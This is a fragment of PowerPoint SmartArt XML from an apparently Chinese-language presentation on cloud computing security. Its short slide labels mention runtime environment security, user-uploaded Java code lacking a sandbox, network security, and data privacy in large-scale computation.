              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>原始数据的导入计算结果的导出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0DBC9C6F-5F62-4C55-AF31-3E6D23446869}" type="parTrans" cxnId="{63AAF4A0-F41A-403B-9D95-D7C24121BFD1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20B30514-81CE-4DF6-848C-CFD0A61AEB40}" type="sibTrans" cxnId="{63AAF4A0-F41A-403B-9D95-D7C24121BFD1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A7A9476-FF55-4695-83CD-EF3C90426C37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>运行环境安全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EF183EF4-17D8-45F3-AC23-5F7ACF6F891A}" type="parTrans" cxnId="{8D8AFDC3-811B-4049-9F11-C81DC92405CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1119711F-A353-4796-B5BB-6C0EBBBBE2F9}" type="sibTrans" cxnId="{8D8AFDC3-811B-4049-9F11-C81DC92405CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B7B910C-B53A-4D8D-857F-C284C1C3B091}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>并不仅仅是认证与授权</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD4C3558-9025-40CA-835A-BAC71A1670EF}" type="parTrans" cxnId="{3830D8E1-BA15-4D72-B0EE-CF3FAC38A3FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9992556-974A-4502-BDF3-50BD75AF3791}" type="sibTrans" cxnId="{3830D8E1-BA15-4D72-B0EE-CF3FAC38A3FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4F3338D-FA5C-4E8B-9A96-A400D4701C63}" type="pres">
      <dgm:prSet presAssocID="{3A823028-2982-4928-A428-5430B6C23FB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D572C62-C4DC-43FF-A5E5-B993BE89D93C}" type="pres">
      <dgm:prSet presAssocID="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{725830D8-5405-4240-BEDB-35EC4F205E69}" type="pres">
      <dgm:prSet presAssocID="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09207B7F-68B6-415C-BF77-CFB1A824C29D}" type="pres">
      <dgm:prSet presAssocID="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" presName="rootText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{606A093B-FEAD-43ED-8F50-264FE62AD7F1}" type="pres">
      <dgm:prSet presAssocID="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1638A65-8799-4B74-B931-BE7E94C104D5}" type="pres">
      <dgm:prSet presAssocID="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27C96EC0-22BF-430A-9371-80FF2A2CE073}" type="pres">
      <dgm:prSet presAssocID="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6F9CA53-94BC-4374-8070-CDDA39A7753E}" type="pres">
      <dgm:prSet presAssocID="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34AA0462-4269-48FE-9802-824A38B8ED92}" type="pres">
      <dgm:prSet presAssocID="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" presName="rootText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{665C3B2C-F51A-4555-B23B-084F265023CB}" type="pres">
      <dgm:prSet presAssocID="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{550B751E-E14E-47BE-BD8C-29D20E66874C}" type="pres">
      <dgm:prSet presAssocID="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF2D9718-E6BC-48FD-AF93-8E430F830867}" type="pres">
      <dgm:prSet presAssocID="{FD4C3558-9025-40CA-835A-BAC71A1670EF}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44189824-7C45-4B12-BBBF-E4E47EB73E22}" type="pres">
      <dgm:prSet presAssocID="{9B7B910C-B53A-4D8D-857F-C284C1C3B091}" presName="childTex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29C08C-1363-4D73-A273-96E161273132}" type="presOf" srcId="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" destId="{09207B7F-68B6-415C-BF77-CFB1A824C29D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{86442E75-27BB-4B1D-95D7-E3677448E0C6}" type="presOf" srcId="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" destId="{34AA0462-4269-48FE-9802-824A38B8ED92}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8D8AFDC3-811B-4049-9F11-C81DC92405CF}" srcId="{3A823028-2982-4928-A428-5430B6C23FBB}" destId="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" srcOrd="1" destOrd="0" parTransId="{EF183EF4-17D8-45F3-AC23-5F7ACF6F891A}" sibTransId="{1119711F-A353-4796-B5BB-6C0EBBBBE2F9}"/>
    <dgm:cxn modelId="{56B0F4E0-5D96-4578-9950-9DD4F7F23072}" type="presOf" srcId="{FD4C3558-9025-40CA-835A-BAC71A1670EF}" destId="{BF2D9718-E6BC-48FD-AF93-8E430F830867}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{3830D8E1-BA15-4D72-B0EE-CF3FAC38A3FF}" srcId="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" destId="{9B7B910C-B53A-4D8D-857F-C284C1C3B091}" srcOrd="0" destOrd="0" parTransId="{FD4C3558-9025-40CA-835A-BAC71A1670EF}" sibTransId="{C9992556-974A-4502-BDF3-50BD75AF3791}"/>
    <dgm:cxn modelId="{63AAF4A0-F41A-403B-9D95-D7C24121BFD1}" srcId="{3A823028-2982-4928-A428-5430B6C23FBB}" destId="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" srcOrd="0" destOrd="0" parTransId="{0DBC9C6F-5F62-4C55-AF31-3E6D23446869}" sibTransId="{20B30514-81CE-4DF6-848C-CFD0A61AEB40}"/>
    <dgm:cxn modelId="{A0887842-417A-4DCF-89B2-6F79F975D767}" type="presOf" srcId="{3A823028-2982-4928-A428-5430B6C23FBB}" destId="{F4F3338D-FA5C-4E8B-9A96-A400D4701C63}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{F0CD24A7-14B2-40BE-ADEC-7CFA6549A133}" type="presOf" srcId="{D83B6101-FB98-465B-BD71-8C5F468C4AB3}" destId="{606A093B-FEAD-43ED-8F50-264FE62AD7F1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{AD93E0A4-2EBE-4B44-92E2-A4096A02D8BA}" type="presOf" srcId="{9B7B910C-B53A-4D8D-857F-C284C1C3B091}" destId="{44189824-7C45-4B12-BBBF-E4E47EB73E22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{344605FA-23C1-4559-A91B-7C0B7FDCC531}" type="presOf" srcId="{4A7A9476-FF55-4695-83CD-EF3C90426C37}" destId="{665C3B2C-F51A-4555-B23B-084F265023CB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{635EDBE3-45D2-4826-86B3-1D832D038430}" type="presParOf" srcId="{F4F3338D-FA5C-4E8B-9A96-A400D4701C63}" destId="{5D572C62-C4DC-43FF-A5E5-B993BE89D93C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{78164ECC-FFC0-4FC6-9D3E-14E744488ED5}" type="presParOf" srcId="{5D572C62-C4DC-43FF-A5E5-B993BE89D93C}" destId="{725830D8-5405-4240-BEDB-35EC4F205E69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{24707DB6-E446-4DB3-88B2-3BA11DCD3444}" type="presParOf" srcId="{725830D8-5405-4240-BEDB-35EC4F205E69}" destId="{09207B7F-68B6-415C-BF77-CFB1A824C29D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{72F243F4-11CA-4919-96E0-5D602B24FF7A}" type="presParOf" srcId="{725830D8-5405-4240-BEDB-35EC4F205E69}" destId="{606A093B-FEAD-43ED-8F50-264FE62AD7F1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{386404F8-20CD-43E3-B2DE-E0454DFC9586}" type="presParOf" srcId="{5D572C62-C4DC-43FF-A5E5-B993BE89D93C}" destId="{F1638A65-8799-4B74-B931-BE7E94C104D5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{C6D6D3E7-0300-4122-81A3-5908A6B3AE21}" type="presParOf" srcId="{F4F3338D-FA5C-4E8B-9A96-A400D4701C63}" destId="{27C96EC0-22BF-430A-9371-80FF2A2CE073}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{E519FE75-9DA6-4075-857A-A4B35DDB40AB}" type="presParOf" srcId="{27C96EC0-22BF-430A-9371-80FF2A2CE073}" destId="{D6F9CA53-94BC-4374-8070-CDDA39A7753E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8591C0B2-6035-4D7C-8E3F-3D9CD32CC972}" type="presParOf" srcId="{D6F9CA53-94BC-4374-8070-CDDA39A7753E}" destId="{34AA0462-4269-48FE-9802-824A38B8ED92}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{4BD5064A-17A2-45EE-A16E-55F948D3AAB1}" type="presParOf" srcId="{D6F9CA53-94BC-4374-8070-CDDA39A7753E}" destId="{665C3B2C-F51A-4555-B23B-084F265023CB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7DC0AEA0-8ED2-48C4-BC6C-93EBE1E9E1C9}" type="presParOf" srcId="{27C96EC0-22BF-430A-9371-80FF2A2CE073}" destId="{550B751E-E14E-47BE-BD8C-29D20E66874C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{E64534A3-65C6-44F8-9E4E-974A467AC4C7}" type="presParOf" srcId="{550B751E-E14E-47BE-BD8C-29D20E66874C}" destId="{BF2D9718-E6BC-48FD-AF93-8E430F830867}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{067E76E5-A479-4543-B4FA-1D4828992A83}" type="presParOf" srcId="{550B751E-E14E-47BE-BD8C-29D20E66874C}" destId="{44189824-7C45-4B12-BBBF-E4E47EB73E2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D767A56-2D11-4507-B612-E834544DB5D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A5A49A3-7C94-46E8-A905-9B266D1B9F41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D9D45F3-C905-49B5-A253-B531C0F7618C}" type="parTrans" cxnId="{B941303A-E590-4D30-A41B-34219A565D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}" type="sibTrans" cxnId="{B941303A-E590-4D30-A41B-34219A565D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1763DE0E-C84C-40FB-BAA0-B0938037EDF4}" type="parTrans" cxnId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8AB56AC-6400-4C9C-B242-A144B62AC18C}" type="sibTrans" cxnId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}">
      <dgm:prSet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用户上传的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java code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39DD6FC9-CAF1-4A10-BA9F-328EFF986CBE}" type="parTrans" cxnId="{332EE02C-2D53-4896-93DC-E1E2C93C2C8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7C0D2D4-5DD1-4A73-8DE0-9EA44C0CF7E2}" type="sibTrans" cxnId="{332EE02C-2D53-4896-93DC-E1E2C93C2C8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}">
      <dgm:prSet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缺乏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sandbox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561293F6-DAE4-4D4C-A781-3655F32AA122}" type="parTrans" cxnId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7677B5C4-1B23-476D-B13F-4767E75EBB77}" type="sibTrans" cxnId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" type="pres">
      <dgm:prSet presAssocID="{8D767A56-2D11-4507-B612-E834544DB5D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A96E356-7F19-439B-BD28-6F3E545A7A3D}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41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92CA2B-597B-4082-A55D-99EF477226A3}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41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7F6D4C-74A7-465E-82F9-E275BB2398FC}" type="pres">
      <dgm:prSet presAssocID="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8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65B576-E055-4DD2-8233-CD3B44B4DA0C}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8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32EE02C-2D53-4896-93DC-E1E2C93C2C8D}" srcId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" destId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}" srcOrd="0" destOrd="0" parTransId="{39DD6FC9-CAF1-4A10-BA9F-328EFF986CBE}" sibTransId="{A7C0D2D4-5DD1-4A73-8DE0-9EA44C0CF7E2}"/>
    <dgm:cxn modelId="{209252DD-FCF1-4C33-9A0D-ABF0ABFEE383}" type="presOf" srcId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" destId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D3087D73-A407-4402-8DED-AA925DE0AEFC}" type="presOf" srcId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}" destId="{D965B576-E055-4DD2-8233-CD3B44B4DA0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{069825E1-884B-482B-BE90-4390FE090A61}" type="presOf" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}" srcId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" destId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}" srcOrd="0" destOrd="0" parTransId="{561293F6-DAE4-4D4C-A781-3655F32AA122}" sibTransId="{7677B5C4-1B23-476D-B13F-4767E75EBB77}"/>
    <dgm:cxn modelId="{480468C7-4C5D-4CA0-BE35-287629433BFE}" type="presOf" srcId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}" destId="{B792CA2B-597B-4082-A55D-99EF477226A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B941303A-E590-4D30-A41B-34219A565D9A}" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" srcOrd="0" destOrd="0" parTransId="{3D9D45F3-C905-49B5-A253-B531C0F7618C}" sibTransId="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}"/>
    <dgm:cxn modelId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" srcOrd="1" destOrd="0" parTransId="{1763DE0E-C84C-40FB-BAA0-B0938037EDF4}" sibTransId="{E8AB56AC-6400-4C9C-B242-A144B62AC18C}"/>
    <dgm:cxn modelId="{7C162F78-73D7-4453-979E-038D852F1A6F}" type="presOf" srcId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" destId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{414F303F-6DB8-4507-97CF-34057422AB86}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A57581F7-09D0-47BE-9009-16463F30E794}" type="presParOf" srcId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" destId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{6E1B3C8F-E7A5-4803-B8D2-200F7A630DB5}" type="presParOf" srcId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" destId="{B792CA2B-597B-4082-A55D-99EF477226A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DB2E026B-BCC5-442C-9B7D-125A07FFEE7A}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{757F6D4C-74A7-465E-82F9-E275BB2398FC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{AA84A1F0-6F1F-4E48-91F9-4DAFCEA7A7DA}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4566A30E-BF67-48F1-9474-77CA3C85F6C1}" type="presParOf" srcId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" destId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{19DF5F22-ED0F-4E2F-96A8-FDAD58DDBEFF}" type="presParOf" srcId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" destId="{D965B576-E055-4DD2-8233-CD3B44B4DA0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52963EC-4307-48D5-84D1-7B51728F239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F59FAA4-4248-435B-9C0D-BB58114ADEC3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>云计算改变互联网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1CBBA16A-A3AC-441C-BB06-A511E16B56D6}" type="parTrans" cxnId="{223CF84C-71AE-4F32-A792-A0AB2CE9F265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74DA8192-1ADF-46B6-8668-655F15A99F46}" type="sibTrans" cxnId="{223CF84C-71AE-4F32-A792-A0AB2CE9F265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C85673F-0B2D-4B91-877E-0B45B553F7A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>弹性计算的环境安全、网络安全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04995BCE-E6E5-40D9-8077-3E130C7B1465}" type="parTrans" cxnId="{E12545DF-2542-433B-B956-1A7F6F41DCF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0087B11-D590-4260-86EC-B8B3E46565E9}" type="sibTrans" cxnId="{E12545DF-2542-433B-B956-1A7F6F41DCF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8677769-D5F6-4C9A-90CA-241E908EDBB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>海量数据计算的数据安全、隐私问题</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9494BABA-CC7E-46A1-91C1-7AED8F35517A}" type="parTrans" cxnId="{F98D300C-D51A-432E-B89C-851CDCE0776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6E305A8-4A5C-43B1-848E-856E35D229C7}" type="sibTrans" cxnId="{F98D300C-D51A-432E-B89C-851CDCE0776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A7CC302-B183-4C69-A544-52CBF65AEB63}" type="pres">
      <dgm:prSet presAssocID="{552963EC-4307-48D5-84D1-7B51728F239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5C8E1DF-0F35-4056-9A8E-5F4351571366}" type="pres">
      <dgm:prSet presAssocID="{AF59FAA4-4248-435B-9C0D-BB58114ADEC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E11F9C-90D4-4B36-9F24-BB25161AC7C2}" type="pres">
